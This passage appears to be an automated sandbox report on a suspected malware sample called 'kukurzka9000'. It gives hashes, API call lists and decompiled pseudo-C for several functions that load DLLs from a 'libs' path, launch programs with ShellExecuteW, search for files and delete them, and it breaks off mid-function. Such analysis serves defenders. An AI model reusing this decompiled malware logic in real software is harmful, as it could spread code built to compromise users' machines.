Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$File$CloseDelete$FindHandleSize
String ID: .$`k
API String ID: 948424528-3438554548
Opcode ID: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
Instruction ID: bc23534fda70af86bf4669e0afe9169a23300414aa6c99c58f2654fb30d6957d
Opcode Fuzzy Hash: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
Instruction Fuzzy Hash: CAA1A171214311AFD705DF61DE88E6B77E9EF88740F004928FA55A72A0DBB4E811CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040864C Relevance: 34.7, APIs: 18, Strings: 5, Instructions: 247
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040864C(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t55;
				void* _t61;
				void* _t73;
				void* _t74;
				signed int _t81;
				void* _t83;
				void* _t90;
				signed int _t91;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t104;
				void* _t106;
				void* _t107;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t122;
				signed int _t137;
				intOrPtr _t146;
				void* _t150;
				void* _t152;

				_t115 = __ecx;
				_v32 = __edx;
				_t152 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx) + _t45);
				_push(_t115);
				_v12 = _t152;
				if( *((intOrPtr*)( *0x40e08c))() == 0x26) {
					L25:
					if(_t152 != 0) {
						LocalFree(_t152);
					}
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t53);
					_v8 = _t55;
					_t150 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t56);
					_v16 = _t150;
					_t61 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t59);
					_t152 = _t61;
					_v24 = _t152;
					_t122 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1ec);
					_t63 = 0;
					_v28 = 0;
					if(_t122 == 0) {
						L3:
						_t8 =  &_v8; // 0x4079e3
						if(E0040A3E4(_t115, _t8, 0, _t63) != 1) {
							goto L17;
						}
						_t73 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228);
						_v20 = _t73;
						if(_t73 == 0) {
							_t74 = _v12;
							if(_t74 != 0) {
								LocalFree(_t74);
							}
							if(_v8 != 0) {
								LocalFree(_v8);
							}
							if(_t150 != 0) {
								LocalFree(_t150);
							}
							goto L25;
						}
						_push(L"libs");
						_t10 =  &_v8; // 0x4079e3
						_push( *_t10);
						if( *((intOrPtr*)( *0x40e114))() != 0) {
							goto L17;
						}
						_t115 = _t115 + _v28 * 2 + 2;
						_t81 = _v20 - _t115;
						_v20 = _t81 >> 1;
						if(_t81 == 0) {
							L33:
							_t83 = _v12;
							if(_t83 != 0) {
								LocalFree(_t83);
							}
							if(_v8 == 0) {
								L38:
								if(_t150 != 0) {
									LocalFree(_t150);
								}
								if(_t152 != 0) {
									LocalFree(_t152);
								}
								return 0;
							} else {
								LocalFree(_v8);
								L37:
								goto L38;
							}
						}
						_t90 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1f0);
						if(_t90 == 0) {
							goto L33;
						}
						_t91 = _t90 - _t115;
						_t92 = _t91 >> 1;
						_v28 = _t91 >> 1;
						if(_t91 == 0) {
							goto L33;
						}
						if(E0040A3E4(_t115,  &_v16, 0, _t92) == 0) {
							L16:
							_t150 = _v16;
							goto L17;
						}
						if(E0040A3E4(_t115,  &_v24, _v28 + 1, _v20) == 0) {
							_t152 = _v24;
							goto L16;
						}
						_t100 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _v32);
						_t146 =  *0x40e258; // 0x6e7a78
						_t101 = E0040A503(_t100, _t146);
						_t150 = _v16;
						_t103 = E0040A503(E0040A503(_t101, _t150), L".dll");
						_t137 =  *0x40e374; // 0x6b96c0
						_v28 = _t137;
						_v20 = _t103;
						_t104 = E00408619( &_v28);
						_t152 = _v24;
						_v28 = _t104;
						E00408495(_t152, _t104, _t103);
						_t106 = _v28;
						if(_t106 != 0) {
							LocalFree(_t106);
						}
						_t107 = _v20;
						if(_t107 != 0) {
							LocalFree(_t107);
						}
						goto L17;
					}
					_t111 = _t122 - _t115;
					_t63 = _t111 >> 1;
					_v28 = _t111 >> 1;
					if(_t111 < 0) {
						_t112 = _v12;
						if(_t112 != 0) {
							LocalFree(_t112);
						}
						_t37 =  &_v8; // 0x4079e3
						_t113 =  *_t37;
						if(_t113 == 0) {
							goto L38;
						} else {
							LocalFree(_t113);
							goto L37;
						}
					}
					goto L3;
					L17:
					if(_v8 != 0) {
						LocalFree(_v8);
					}
					if(_t150 != 0) {
						LocalFree(_t150);
					}
					if(_t152 != 0) {
						LocalFree(_t152);
					}
					_t34 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228) + 2; // 0x2
					_t115 = _t34;
					_push(_t115);
				} while ( *((intOrPtr*)( *0x40e08c))() != 0x26);
				_t152 = _v12;
				goto L25;
			}

0x0040865f
0x00408663
0x00408675
0x00408677
0x00408678
0x00408680
0x00408888
0x0040888a
0x0040888d
0x0040888d
0x00000000
0x00000000
0x00000000
0x00000000
0x00408686
0x00408686
0x00408699
0x004086a8
0x004086ba
0x004086c3
0x004086cd
0x004086db
0x004086de
0x004086e3
0x004086e5
0x004086e7
0x004086ec
0x004086fd
0x00408700
0x0040870f
0x00000000
0x00000000
0x00408721
0x00408723
0x00408728
0x004088ea
0x004088ef
0x004088f2
0x004088f2
0x004088fc
0x00408901
0x00408901
0x00408909
0x00408910
0x00408910
0x00000000
0x00408909
0x00408734
0x00408739
0x00408739
0x00408740
0x00000000
0x00000000
0x0040874f
0x00408752
0x00408756
0x00408759
0x004088b3
0x004088b3
0x004088b8
0x004088bb
0x004088bb
0x004088c5
0x004088d0
0x004088d2
0x004088d5
0x004088d5
0x004088dd
0x004088e0
0x004088e0
0x00000000
0x004088c7
0x004088ca
0x004088ca
0x00000000
0x004088ca
0x004088c5
0x0040876b
0x0040876f
0x00000000
0x00000000
0x00408775
0x00408777
0x00408779
0x0040877c
0x00000000
0x00000000
0x00408793
0x0040883b
0x0040883b
0x00000000
0x0040883b
0x004087b0
0x00408838
0x00000000
0x00408838
0x004087c9
0x004087ce
0x004087d6
0x004087db
0x004087ee
0x004087f3
0x004087fb
0x00408801
0x00408804
0x0040880a
0x00408811
0x00408814
0x00408819
0x0040881f
0x00408822
0x00408822
0x00408828
0x0040882d
0x00408830
0x00408830
0x00000000
0x0040882d
0x004086f0
0x004086f2
0x004086f4
0x004086f7
0x0040889b
0x004088a0
0x004088a3
0x004088a3
0x004088a9
0x004088a9
0x004088ae
0x00000000
0x004088b0
0x004088ca
0x00000000
0x004088ca
0x004088ae
0x00000000
0x0040883e
0x00408842
0x00408847
0x00408847
0x0040884f
0x00408852
0x00408852
0x0040885a
0x0040885d
0x0040885d
0x00408871
0x00408871
0x00408879
0x0040887c
0x00408885
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 0040866D
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 00408699
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086B2
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408822
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408830
LocalFree.KERNEL32(00000000), ref: 00408847
LocalFree.KERNEL32(00000000), ref: 00408852
LocalFree.KERNEL32(00000000), ref: 0040885D
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 0040888D
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088A3
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088BB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088CA
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088D5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088E0
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088F2
LocalFree.KERNEL32(00000000), ref: 00408901
LocalFree.KERNEL32(00000000), ref: 00408910

Strings

libs, xrefs: 00408734
xzn, xrefs: 004087CE
y@, xrefs: 00408700, 00408739, 004088A9, 004088B0
.dll, xrefs: 004087E7
y@, xrefs: 00408844, 004088FE

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID: .dll$libs$xzn$y@$y@
API String ID: 3098330729-2023263662
Opcode ID: 256491809de4a65429cad93a6271d82b62e2b5fb655f29cdfe79702446f82b76
Instruction ID: 52a9afaef70bc3ab584d26b5193ec900674cb85d6b4cf00b99d66efe4c6f1661
Opcode Fuzzy Hash: 256491809de4a65429cad93a6271d82b62e2b5fb655f29cdfe79702446f82b76
Instruction Fuzzy Hash: EE818672A002159BDB04EFA5DF85A6E77B8AB44310B44483EE941F7390DF78ED11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B693B Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B6CD6

Part of subcall function 022B9958: LocalFree.KERNEL32(00000000,?,022B32BA,00000002,?), ref: 022B99BD

ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 022B6BE7
LocalFree.KERNEL32(?), ref: 022B6BF0
LocalFree.KERNEL32(00000000), ref: 022B6BF7
LocalFree.KERNEL32(00000000), ref: 022B6BFE
LocalFree.KERNEL32(?), ref: 022B6C07

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

ShellExecuteW.SHELL32(00000000,0040D968,?,?,00000000,00000000), ref: 022B6C37
LocalFree.KERNEL32(?), ref: 022B6C41
LocalFree.KERNEL32(?), ref: 022B6C4A
LocalFree.KERNEL32(?), ref: 022B6C51
LocalFree.KERNEL32(?), ref: 022B6C5A
LocalFree.KERNEL32(?), ref: 022B6C82
LocalFree.KERNEL32(?), ref: 022B6C8B
LocalFree.KERNEL32(?), ref: 022B6C92
LocalFree.KERNEL32(?), ref: 022B6C9B
LocalFree.KERNEL32(?), ref: 022B6CA9
LocalFree.KERNEL32(00000000), ref: 022B6CB8
LocalFree.KERNEL32(00000000), ref: 022B6CC1

Strings

xzn, xrefs: 022B6B8D

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$ExecuteShell$Global
String ID: xzn
API String ID: 3422199401-3665378777
Opcode ID: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
Instruction ID: ff76f625c5a1e01567f6165200c33b77e330ea5b3213c49159033ceccaa4b4d2
Opcode Fuzzy Hash: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
Instruction Fuzzy Hash: F0A12C72A10226AFDB159FE5DE48DFE77B9EF44340B004824EA05F7264DB74AD11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA Relevance: 31.6, APIs: 25, Instructions: 347
memoryCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0040A7DA(short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				short* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t116;
				void* _t120;
				void* _t139;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				void* _t150;
				void* _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t164;
				char _t206;
				void* _t219;
				void* _t228;
				signed int _t231;
				intOrPtr _t232;
				void* _t235;
				void* _t242;
				signed int _t246;
				signed int _t249;
				void* _t250;
				void* _t251;
				void* _t253;
				void* _t254;

				_v48 = __edx;
				_v28 = _t164;
				_t161 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e2a4);
				if(_t161 == 0) {
					L24:
					return 0;
				}
				while(1) {
					_t162 = _t161 + 0xa;
					_t80 =  *((intOrPtr*)( *0x40e18c))(_t162,  *0x40e1f0);
					_t3 = _t80 + 2; // 0x2
					_t224 = _t3;
					_t81 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v36 = _t81;
					_t84 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t82);
					_v8 = _t84;
					_t88 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t86);
					_v12 = _t88;
					_t91 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t89);
					_v16 = _t91;
					_t94 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t92);
					_v20 = _t94;
					_t242 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t95);
					_t100 = _v36 - _t162 >> 1;
					_v24 = _t242;
					_v44 = _v36 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v8, _t224 - _t162 >> 1, _t100) == 0) {
						break;
					}
					_t228 =  *((intOrPtr*)( *0x40e18c))(_v36 + 2,  *0x40e1e8);
					_t246 = _t228 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v12, _v44 + 1, _t246) == 0) {
						L20:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						L22:
						L23:
						goto L24;
					}
					_t21 = _t228 + 2; // 0x2
					_t116 =  *((intOrPtr*)( *0x40e18c))(_t21,  *0x40e1e8);
					_v44 = _t116;
					_t23 = _t246 + 1; // 0x1
					_t231 = _t116 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v16, _t23, _t231) == 0) {
						goto L20;
					}
					_t120 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e1e8);
					_v44 = _t120;
					_t27 = _t231 + 1; // 0x1
					_t249 = _t120 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v20, _t27, _t249) == 0) {
						goto L20;
					}
					_t232 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e228);
					_v56 = _t232;
					_t32 = _t249 + 1; // 0x1
					if(E0040A3E4(_t162,  &_v24, _t32, _t232 - _t162 >> 1) == 0) {
						goto L20;
					}
					_t250 =  *((intOrPtr*)( *0x40e074))(_v12);
					if(_t250 > 0) {
						_t163 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_push(0);
						_push(_t250);
						_push(_t163);
						_push(0);
						if( *((intOrPtr*)( *0x40e0c4))() != 0) {
							_t139 =  *((intOrPtr*)( *0x40e000))(_t163, _t163, _v16);
							_v36 = _v36 & 0x00000000;
							_t163 = _t139;
							_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							E0040B177(_v8, _t163, _t163, _v20, _v24, _t141,  &_v36);
							_t254 = _t254 + 0x14;
							if(_v36 <= 0) {
								_t251 = _v32;
							} else {
								_t145 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t219 = 0x10;
								_t147 = E0040A05F(_t145, _t219);
								_t253 = _t147;
								_v52 = _t253;
								_t149 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t146,  *0x40e210), _t253);
								_t206 =  *0x40e204; // 0x6e78d8
								_v60 = _v60 & 0x00000000;
								_v64 = _t206;
								_v44 = _t149;
								_t150 = E00408619( &_v44);
								_v40 = _t150;
								_t235 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, 0, 0, 0, 0);
								if(0 == 0) {
									_t251 = _v32;
								} else {
									 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, _t235, 0, 0, 0);
									_t251 = _v32;
									if(0 != 0) {
										E00407EDB(_v48, _t235, 0, 0, _v36, _t251, _v40,  &_v64);
										_t254 = _t254 + 0x18;
									}
								}
								LocalFree(_t235);
								LocalFree(_v40);
								LocalFree(_v44);
								LocalFree(_v52);
								_t232 = _v56;
							}
							LocalFree(_t251);
						}
						LocalFree(_t163);
					}
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					_t66 = _t232 + 2; // 0x2
					_t161 =  *((intOrPtr*)( *0x40e18c))(_t66,  *0x40e2a4);
					if(_t161 != 0) {
						continue;
					} else {
						goto L23;
					}
				}
				LocalFree(_v8);
				LocalFree(_v12);
				LocalFree(_v16);
				LocalFree(_v20);
				LocalFree(_t242);
				goto L22;
			}

0x0040a7ec
0x0040a7f0
0x0040a7f5
0x0040a7f9
0x0040abd3
0x0040abd7
0x0040abd7
0x0040a801
0x0040a80c
0x0040a810
0x0040a81e
0x0040a81e
0x0040a822
0x0040a833
0x0040a83d
0x0040a848
0x0040a857
0x0040a868
0x0040a872
0x0040a883
0x0040a88d
0x0040a89e
0x0040a8aa
0x0040a8b8
0x0040a8be
0x0040a8c1
0x0040a8cd
0x00000000
0x00000000
0x0040a8ee
0x0040a8f4
0x0040a904
0x0040ab7d
0x0040ab80
0x0040ab89
0x0040ab92
0x0040ab9b
0x0040abcb
0x0040abcb
0x0040abd1
0x00000000
0x0040abd2
0x0040a916
0x0040a91a
0x0040a91e
0x0040a923
0x0040a926
0x0040a938
0x00000000
0x00000000
0x0040a951
0x0040a955
0x0040a95a
0x0040a95d
0x0040a96f
0x00000000
0x00000000
0x0040a98a
0x0040a991
0x0040a999
0x0040a9a8
0x00000000
0x00000000
0x0040a9b8
0x0040a9bc
0x0040a9d7
0x0040a9d9
0x0040a9db
0x0040a9dc
0x0040a9dd
0x0040a9e3
0x0040a9f3
0x0040a9f5
0x0040a9f9
0x0040aa0c
0x0040aa1d
0x0040aa22
0x0040aa29
0x0040ab21
0x0040aa2f
0x0040aa3c
0x0040aa49
0x0040aa4d
0x0040aa52
0x0040aa63
0x0040aa66
0x0040aa6f
0x0040aa74
0x0040aa7a
0x0040aa7e
0x0040aa84
0x0040aa87
0x0040aa99
0x0040aaa4
0x0040aab5
0x0040aab9
0x0040aaf7
0x0040aabb
0x0040aad0
0x0040aad2
0x0040aad7
0x0040aaed
0x0040aaf2
0x0040aaf2
0x0040aad7
0x0040aafb
0x0040ab04
0x0040ab0d
0x0040ab16
0x0040ab1c
0x0040ab1c
0x0040ab25
0x0040ab25
0x0040ab2c
0x0040ab2c
0x0040ab35
0x0040ab3e
0x0040ab47
0x0040ab50
0x0040ab59
0x0040ab6b
0x0040ab71
0x0040ab75
0x00000000
0x0040ab7b
0x00000000
0x0040ab7b
0x0040ab75
0x0040aba9
0x0040abb2
0x0040abbb
0x0040abc4
0x0040abcb
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A83D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A857
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A872
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A88D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A8A8

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB2C

Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
Part of subcall function 0040B177: LocalFree.KERNEL32(?), ref: 0040B4D9
Part of subcall function 0040B177: FindClose.KERNEL32(00000000), ref: 0040B4E0

LocalFree.KERNEL32(?), ref: 0040AB25

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 0040AAFB
LocalFree.KERNEL32(?), ref: 0040AB04
LocalFree.KERNEL32(?), ref: 0040AB0D
LocalFree.KERNEL32(?), ref: 0040AB16
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB35
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB3E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB47
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB50
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB59
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB80
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB89
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB92
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB9B
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABBB
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABC4
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABCB

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$CloseFindGlobal
String ID:
API String ID: 2275475116-0
Opcode ID: 396c3cc9efd4a9f6a2a8ad3e428ea3bae641bf45c8fb29a5b1716293b6aaf1ac
Instruction ID: f9c1c7988c740e23ec6b3556d7cabdce8ac8e299f89005d849d6ceee94cacba7
Opcode Fuzzy Hash: 396c3cc9efd4a9f6a2a8ad3e428ea3bae641bf45c8fb29a5b1716293b6aaf1ac
Instruction Fuzzy Hash: 2DC18772900215AFDF089FA6DE45EAE7BB5EF48310F044539F905B72A0DB746D20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B27AA Relevance: 30.4, APIs: 20, Instructions: 437fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B2837

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B2886
LocalFree.KERNEL32(00000000), ref: 022B2895
LocalFree.KERNEL32(00000000), ref: 022B28A4
LocalFree.KERNEL32(00000000), ref: 022B28AF
LocalFree.KERNEL32(00000000), ref: 022B28BA
LocalFree.KERNEL32(00000000), ref: 022B29DF
LocalFree.KERNEL32(?), ref: 022B29E6
LocalFree.KERNEL32(00000000), ref: 022B2A12
LocalFree.KERNEL32(?), ref: 022B2A19
LocalFree.KERNEL32(00000000), ref: 022B2CBB
DeleteFileW.KERNEL32(?), ref: 022B2CC2
LocalFree.KERNEL32(?), ref: 022B2CC9

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
Instruction ID: 77830ca6bb72a3de030cdc600c4d449d2fbb612018f166b466b028b91a3418c4
Opcode Fuzzy Hash: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
Instruction Fuzzy Hash: D2F18C71910215EFDB06DFA6EE48AEE7BB5FF08310F144924F915B32A0DB749920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7E Relevance: 30.3, APIs: 24, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404F7E(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e39c);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x6e78d8
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
